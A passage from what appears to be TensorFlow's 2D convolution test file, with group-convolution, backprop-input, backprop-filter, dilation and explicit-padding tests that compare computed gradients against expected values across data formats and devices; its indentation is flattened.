results = self.evaluate([group_conv, group_conv_loop])
tol_to_use = 1e-5
self.assertAllClose(
results[0], results[1], atol=tol_to_use, rtol=tol_to_use)
@test_util.run_in_graph_and_eager_modes
@test_util.run_cuda_only
def testConv2DGroupConvFwd(self):
for data_format in ["NHWC", "NCHW"]:
for dilation in [1, 2]:
for stride in [1, 2]:
self._VerifyGroupConvFwd([10, 32, 32, 16], [3, 3, 4, 8],
dilations=[dilation, dilation],
strides=[stride, stride],
padding="SAME",
data_format=data_format,
dtype=dtypes.float32)
@test_util.deprecated_graph_mode_only
@test_util.run_cuda_only
def testInputGradientGroupConv(self):
for data_format in ["NCHW", "NHWC"]:
for test_input in [True, False]:
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
num_groups=2,
padding="VALID",
in_depth=4,
out_depth=6,
stride_rows=1,
stride_cols=1,
test_input=test_input,
data_format=data_format,
use_gpu=True,
max_err=0.005)
@test_util.deprecated_graph_mode_only
@test_util.run_cuda_only
def testFilterGradientGroupConv(self):
for data_format in ["NCHW", "NHWC"]:
for test_input in [True, False]:
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
num_groups=2,
padding="VALID",
in_depth=4,
out_depth=6,
stride_rows=1,
stride_cols=1,
test_input=test_input,
data_format=data_format,
use_gpu=True,
max_err=0.005)
def _RunAndVerifyBackpropInput(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu,
err,
dilations=(1, 1)):
if use_gpu and not test.is_gpu_available(cuda_only=True):
return
x1 = self._CreateNumpyTensor(filter_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
with test_util.device(use_gpu):
if len(input_sizes) == 4:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t0 = constant_op.constant(input_sizes, shape=[len(input_sizes)])
t1 = constant_op.constant(x1, shape=filter_sizes)
t2 = constant_op.constant(x2, shape=output_sizes)
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
if isinstance(padding, (list, tuple)):
padding = [(0, 0)] + padding + [(0, 0)]
if data_format == "NCHW":
t2 = test_util.NHWCToNCHW(t2)
strides = test_util.NHWCToNCHW(strides)
dilations = test_util.NHWCToNCHW(dilations)
if isinstance(padding, (list, tuple)):
padding = test_util.NHWCToNCHW((padding))
conv = nn_ops.conv2d_backprop_input(
t0,
t1,
t2,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
value = self.evaluate(conv)
self.assertShapeEqual(value, conv)
tf_logging.debug("expected = %s", expected)
tf_logging.debug("actual = %s", value)
self.assertAllCloseAccordingToType(expected, value.flatten(), atol=1e-5)
def _CompareBackpropInput(self, input_sizes, filter_sizes, output_sizes,
conv_strides, padding):
x1 = np.random.rand(*filter_sizes).astype(np.float32)
x2 = np.random.rand(*output_sizes).astype(np.float32)
def _GetVal(data_format, use_gpu):
with test_util.device(use_gpu):
if data_format == "NCHW":
new_input_sizes = test_util.NHWCToNCHW(input_sizes)
else:
new_input_sizes = input_sizes
t0 = constant_op.constant(new_input_sizes, shape=[len(new_input_sizes)])
t1 = constant_op.constant(x1, shape=filter_sizes)
t2 = constant_op.constant(x2, shape=output_sizes)
strides = [1] + conv_strides + [1]
if data_format == "NCHW":
t2 = test_util.NHWCToNCHW(t2)
strides = test_util.NHWCToNCHW(strides)
conv = nn_ops.conv2d_backprop_input(
t0,
t1,
t2,
strides=strides,
padding=padding,
data_format=data_format)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
ret = self.evaluate(conv)
self.assertShapeEqual(ret, conv)
return ret
values = []
for (data_format, use_gpu) in GetTestConfigs():
values.append(_GetVal(data_format, use_gpu))
for i in range(1, len(values)):
self.assertAllClose(values[0], values[i], rtol=1e-2, atol=1e-2)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth1ValidBackpropInput(self):
expected_output = [1.0, 4.0, 4.0, 3.0, 10.0, 8.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyBackpropInput(self):
expected_output = []
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropInput(self):
expected_output = [
14.0, 32.0, 50.0, 100.0, 163.0, 226.0, 167.0, 212.0, 257.0, 122.0,
140.0, 158.0, 478.0, 541.0, 604.0, 437.0, 482.0, 527.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropInputStride1x2(self):
expected_output = [
1.0, 2.0, 2.0, 4.0, 3.0, 6.0, 7.0, 12.0, 11.0, 18.0, 15.0, 24.0, 12.0,
16.0, 15.0, 20.0, 18.0, 24.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 2, 3, 1],
strides=[1, 2],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DStrideTwoFilterOneSameBackpropInput(self):
expected_output = [
1.0, 0.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 4.0, 0.0, 0.0, 0.0,
0.0, 0.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 4, 4, 1],
filter_sizes=[1, 1, 1, 1],
output_sizes=[1, 2, 2, 1],
strides=[2, 2],
padding="SAME",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeBackpropInput(self):
expected_output = [5.0, 11.0, 17.0, 23.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 2, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
@test_util.disable_xla("XLA requires input_sizes to be a 4D shape.")
def testConv2DInputSizesContainsOnlySpatialDimensionsBackpropInput(self):
expected_output = [5.0, 11.0, 17.0, 23.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[2, 2],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
def _RunAndVerifyBackpropFilter(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu,
dilations=(1, 1),
err=1e-5):
x0 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
explicit_strides = [1] + strides + [1]
new_padding = padding
new_dilations = [1] + dilations + [1]
if isinstance(new_padding, (list, tuple)):
new_padding = [(0, 0)] + new_padding + [(0, 0)]
if data_format == "NCHW":
explicit_strides = test_util.NHWCToNCHW(explicit_strides)
new_dilations = test_util.NHWCToNCHW(new_dilations)
if isinstance(padding, (list, tuple)):
new_padding = test_util.NHWCToNCHW(new_padding)
for dtype in self._DtypesToTest(use_gpu=use_gpu):
with test_util.device(use_gpu):
t0 = constant_op.constant(x0, shape=input_sizes, dtype=dtype)
t1 = constant_op.constant(filter_sizes, shape=[len(filter_sizes)])
t2 = constant_op.constant(x2, shape=output_sizes, dtype=dtype)
if data_format == "NCHW":
t0 = test_util.NHWCToNCHW(t0)
t2 = test_util.NHWCToNCHW(t2)
conv = nn_ops.conv2d_backprop_filter(
t0,
t1,
t2,
strides=explicit_strides,
padding=new_padding,
dilations=new_dilations,
data_format=data_format)
value = self.evaluate(conv)
self.assertShapeEqual(value, conv)
tf_logging.debug("expected = %s", expected)
tf_logging.debug("actual = %s", value)
self.assertArrayNear(expected, value.flatten(), err)
def _CompareBackFilter(self, input_sizes, filter_sizes, output_sizes,
conv_strides, padding):
x0 = np.random.rand(*input_sizes).astype(np.float32)
x2 = np.random.rand(*output_sizes).astype(np.float32)
def _GetVal(data_format, use_gpu):
with test_util.device(use_gpu):
t0 = constant_op.constant(x0, shape=input_sizes)
t1 = constant_op.constant(filter_sizes, shape=[len(filter_sizes)])
t2 = constant_op.constant(x2, shape=output_sizes)
strides = [1] + conv_strides + [1]
if data_format == "NCHW":
t0 = test_util.NHWCToNCHW(t0)
t2 = test_util.NHWCToNCHW(t2)
strides = test_util.NHWCToNCHW(strides)
conv = nn_ops.conv2d_backprop_filter(
t0,
t1,
t2,
strides=strides,
padding=padding,
data_format=data_format)
ret = self.evaluate(conv)
self.assertShapeEqual(ret, conv)
return ret
values = []
for (data_format, use_gpu) in GetTestConfigs():
values.append(_GetVal(data_format, use_gpu))
for i in range(1, len(values)):
self.assertAllClose(values[0], values[i], rtol=1e-4, atol=1e-4)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth1ValidBackpropFilter(self):
expected = [5.0, 8.0, 14.0, 17.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyBackpropFilter(self):
expected = []
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 0],
output_sizes=[1, 1, 2, 0],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DBackpropFilterWithEmptyInput(self):
expected = [0, 0, 0, 0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropFilter(self):
expected = [
17.0, 22.0, 27.0, 22.0, 29.0, 36.0, 27.0, 36.0, 45.0, 32.0, 43.0, 54.0,
37.0, 50.0, 63.0, 42.0, 57.0, 72.0, 62.0, 85.0, 108.0, 67.0, 92.0,
117.0, 72.0, 99.0, 126.0, 77.0, 106.0, 135.0, 82.0, 113.0, 144.0, 87.0,
120.0, 153.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropFilterStride1x2(self):
expected = [161.0, 182.0, 287.0, 308.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 2, 3, 1],
strides=[1, 2],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DStrideTwoFilterOneSameBackpropFilter(self):
expected_output = [78.]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 4, 4, 1],
filter_sizes=[1, 1, 1, 1],
output_sizes=[1, 2, 2, 1],
strides=[2, 2],
padding="SAME",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeBackpropFilter(self):
expected_output = [1.0, 2.0, 2.0, 4.0, 3.0, 6.0, 4.0, 8.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 2, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu)
def _RunAndVerifyBackpropInputDilation(self, input_sizes, filter_sizes,
output_sizes, strides, dilations,
padding, data_format, use_gpu, err):
x1 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(filter_sizes)
default_dilations = (dilations[0] == 1 and dilations[1] == 1)
if default_dilations or use_gpu:
with self.cached_session(use_gpu=use_gpu) as sess:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t1 = constant_op.constant(x1, shape=input_sizes)
t2 = constant_op.constant(x2, shape=filter_sizes)
full_strides = [1] + strides + [1]
full_dilations = [1] + dilations + [1]
if data_format == "NCHW":
full_strides = test_util.NHWCToNCHW(full_strides)
full_dilations = test_util.NHWCToNCHW(full_dilations)
conv_forward = nn_ops.conv2d(
t1,
t2,
strides=full_strides,
dilations=full_dilations,
padding=padding,
data_format=data_format)
conv_forward_2 = nn_ops.convolution(
t1,
t2,
padding=padding,
strides=strides,
dilation_rate=dilations,
data_format=data_format)
if data_format == "NCHW":
conv_forward = test_util.NCHWToNHWC(conv_forward)
conv_forward_2 = test_util.NCHWToNHWC(conv_forward_2)
conv = gradients_impl.gradients(conv_forward, t1)[0]
conv_2 = gradients_impl.gradients(conv_forward_2, t1)[0]
value = self.evaluate(conv)
value_2 = self.evaluate(conv_2)
self.assertShapeEqual(value, conv)
self.assertShapeEqual(value_2, conv_2)
tf_logging.debug("expected = %s", value_2)
tf_logging.debug("actual = %s", value)
self.assertArrayNear(value_2.flatten(), value.flatten(), err)
def _RunAndVerifyBackpropFilterDilation(self, input_sizes, filter_sizes,
output_sizes, strides, dilations,
padding, data_format, use_gpu, err):
x1 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(filter_sizes)
default_dilations = (dilations[0] == 1 and dilations[1] == 1)
if default_dilations or use_gpu:
with self.cached_session(use_gpu=use_gpu) as sess:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t1 = constant_op.constant(x1, shape=input_sizes)
t2 = constant_op.constant(x2, shape=filter_sizes)
full_strides = [1] + strides + [1]
full_dilations = [1] + dilations + [1]
if data_format == "NCHW":
full_strides = test_util.NHWCToNCHW(full_strides)
full_dilations = test_util.NHWCToNCHW(full_dilations)
conv_forward = nn_ops.conv2d(
t1,
t2,
strides=full_strides,
dilations=full_dilations,
padding=padding,
data_format=data_format)
conv_forward_2 = nn_ops.convolution(
t1,
t2,
padding=padding,
strides=strides,
dilation_rate=dilations,
data_format=data_format)
if data_format == "NCHW":
conv_forward = test_util.NCHWToNHWC(conv_forward)
conv_forward_2 = test_util.NCHWToNHWC(conv_forward_2)
conv = gradients_impl.gradients(conv_forward, t2)[0]
conv_2 = gradients_impl.gradients(conv_forward, t2)[0]
value = self.evaluate(conv)
value_2 = self.evaluate(conv_2)
self.assertShapeEqual(value, conv)
self.assertShapeEqual(value_2, conv_2)
tf_logging.debug("expected = %s", value_2)
tf_logging.debug("actual = %s", value)
self.assertArrayNear(value_2.flatten(), value.flatten(), err)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropFilterStride1x1Dilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 5, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth1ValidBackpropFilterDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DEmptyBackpropFilterDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 0],
output_sizes=[1, 1, 2, 0],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropFilterDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 4, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DKernelSizeMatchesInputSizeBackpropFilterDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropInputStride1x1Dilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 5, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth1ValidBackpropInputDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DEmptyBackpropInputDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropInputDilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 2, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
@test_util.deprecated_graph_mode_only
def testConv2DKernelSizeMatchesInputSizeBackpropInputDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
def _RunAndVerifyBackpropInputExplicitPadding(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
data_format,
use_gpu,
dilations=(1, 1),
err=2e-5):
if use_gpu and not test.is_gpu_available(cuda_only=True):
return
if not use_gpu and dilations != (1, 1):
return
x1 = self._CreateNumpyTensor(filter_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
padded_input_sizes = input_sizes[:]
padded_input_sizes[1] += padding[0][0] + padding[0][1]
padded_input_sizes[2] += padding[1][0] + padding[1][1]
c = nn_ops.conv2d_backprop_input(
padded_input_sizes,
x1,
x2,
strides=[1] + strides + [1],
padding="VALID",
dilations=[1] + dilations + [1])
c = c[:, padding[0][0]:(c.shape[1] - padding[0][1]), padding[1][0]:(
c.shape[2] - padding[1][1]), :]
expected = list(self.evaluate(array_ops.reshape(c, [-1])))
self._RunAndVerifyBackpropInput(
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu=use_gpu,
err=err,
dilations=dilations)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding0x0BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding=[[0, 0], [0, 0]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 4, 2],
filter_sizes=[2, 2, 2, 3],
output_sizes=[1, 1, 2, 3],
strides=[2, 2],
padding=[[0, 0], [0, 0]],
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding1x1BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 3, 4, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 2],
filter_sizes=[1, 1, 2, 1],
output_sizes=[1, 4, 3, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 4, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 4, 2, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
data_format=data_format,
dilations=[2, 2], use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding2x2BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[2, 3, 1, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[2, 2, 5, 1],
strides=[3, 1],
padding=[[2, 2], [2, 2]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 6, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 3, 4, 1],
strides=[1, 2],
padding=[[2, 2], [2, 2]],
data_format=data_format,
dilations=[2, 3],
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_1_8_4_1_BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 10, 8, 1],
strides=[1, 1],
padding=[[1, 8], [4, 2]],
data_format=data_format,
use_gpu=use_gpu,
err=5e-5)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 5, 3, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 4, 8, 1],
strides=[3, 1],
padding=[[1, 8], [4, 2]],
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_5_0_2_2_BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[1, 7, 7, 1],
strides=[1, 1],
padding=[[5, 0], [2, 2]],
data_format=data_format,
err=5e-5,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 4, 2, 1],
filter_sizes=[3, 3, 1, 1],
output_sizes=[1, 5, 2, 1],
strides=[1, 2],
padding=[[5, 0], [2, 2]],
data_format=data_format,
dilations=[2, 1],
use_gpu=use_gpu)
def _RunAndVerifyBackpropFilterExplicitPadding(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
data_format,
use_gpu,
dilations=(1, 1),
err=1e-5):
if use_gpu and not test.is_gpu_available(cuda_only=True):
return
if not use_gpu and dilations != (1, 1):
return
x0 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
x0 = np.pad(x0, [(0, 0)] + padding + [(0, 0)], "constant")
c = nn_ops.conv2d_backprop_filter(
x0,
filter_sizes,
x2,
strides=[1] + strides + [1],
padding="VALID",
dilations=[1] + dilations + [1])
expected = list(self.evaluate(array_ops.reshape(c, [-1])))
self._RunAndVerifyBackpropFilter(
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu=use_gpu,
dilations=dilations,
err=err)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding0x0BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding=[[0, 0], [0, 0]],
data_format=data_format, use_gpu=use_gpu)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 3, 4, 2],
filter_sizes=[2, 2, 2, 3],
output_sizes=[1, 1, 2, 3],
strides=[2, 2],
padding=[[0, 0], [0, 0]],
data_format=data_format, use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding1x1BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 3, 4, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu,
err=5e-5)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 2],
filter_sizes=[1, 1, 2, 1],
output_sizes=[1, 4, 3, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
use_gpu=use_gpu,
data_format=data_format)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 4, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 4, 2, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu,
dilations=[2, 2])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding2x2BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[2, 3, 1, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[2, 2, 5, 1],
strides=[3, 1],
padding=[[2, 2], [2, 2]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 3, 6, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 3, 4, 1],
strides=[1, 2],
padding=[[2, 2], [2, 2]],
data_format=data_format,
use_gpu=use_gpu,
dilations=[2, 3])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_1_8_4_1_BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 10, 8, 1],
strides=[1, 1],
padding=[[1, 8], [4, 2]],
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 5, 3, 1],
